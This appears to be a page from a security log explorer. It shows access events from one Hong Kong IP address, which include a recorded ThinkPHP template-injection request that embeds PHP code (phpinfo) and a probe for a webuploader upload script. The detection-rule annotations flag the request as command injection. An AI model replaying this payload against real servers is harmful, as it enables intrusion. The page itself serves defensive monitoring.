← Back to IP report

Log Explorer

Fact drill-down for 103.225.84.57

Risk 3 LOW Scope All time All-time facts 5 In-scope 5 Filtered 5 Seen 2025-01-25 → 2025-01-25

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

cmdi 3 base 2

Top labels (facts, in-scope)

cmdi 3 observed 2

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 1 — total 5 rows

← Prev Next →

#1 2025-01-25 20:58:19 event 2978292 GET 200 bytes 7180

ann base label observed

Request event observed

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

event observed

details

—

subnet

103.225.84.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Tai Po District, Tai Po Kau Lo Wai

org

Dragon Network Intl Co. Ltd

#2 2025-01-25 20:58:19 event 2978292 GET 200 bytes 7180

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

103.225.84.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Tai Po District, Tai Po Kau Lo Wai

org

Dragon Network Intl Co. Ltd

#3 2025-01-25 20:58:19 event 2978292 GET 200 bytes 7180

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

103.225.84.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Tai Po District, Tai Po Kau Lo Wai

org

Dragon Network Intl Co. Ltd

#4 2025-01-25 20:58:19 event 2978292 GET 200 bytes 7180

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /?s=index/\think\View/display&content="<?><?php phpinfo();?>&data=1 -'

subnet

103.225.84.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Tai Po District, Tai Po Kau Lo Wai

org

Dragon Network Intl Co. Ltd

#5 2025-01-25 01:38:20 event 2905785 GET 404 bytes 8110

ann base label observed

Request event observed

/Public/admin/lib/webuploader/0.1.5/server/fileupload.php

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Public/admin/lib/webuploader/0.1.5/server/fileupload.php

referer

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

summary

event observed

details

—

subnet

103.225.84.0/24

asn

21859 — Zenlayer Inc

geo

Hong Kong, Tai Po District, Tai Po Kau Lo Wai

org

Dragon Network Intl Co. Ltd

Log Explorer

Annotated access events

Confirm Action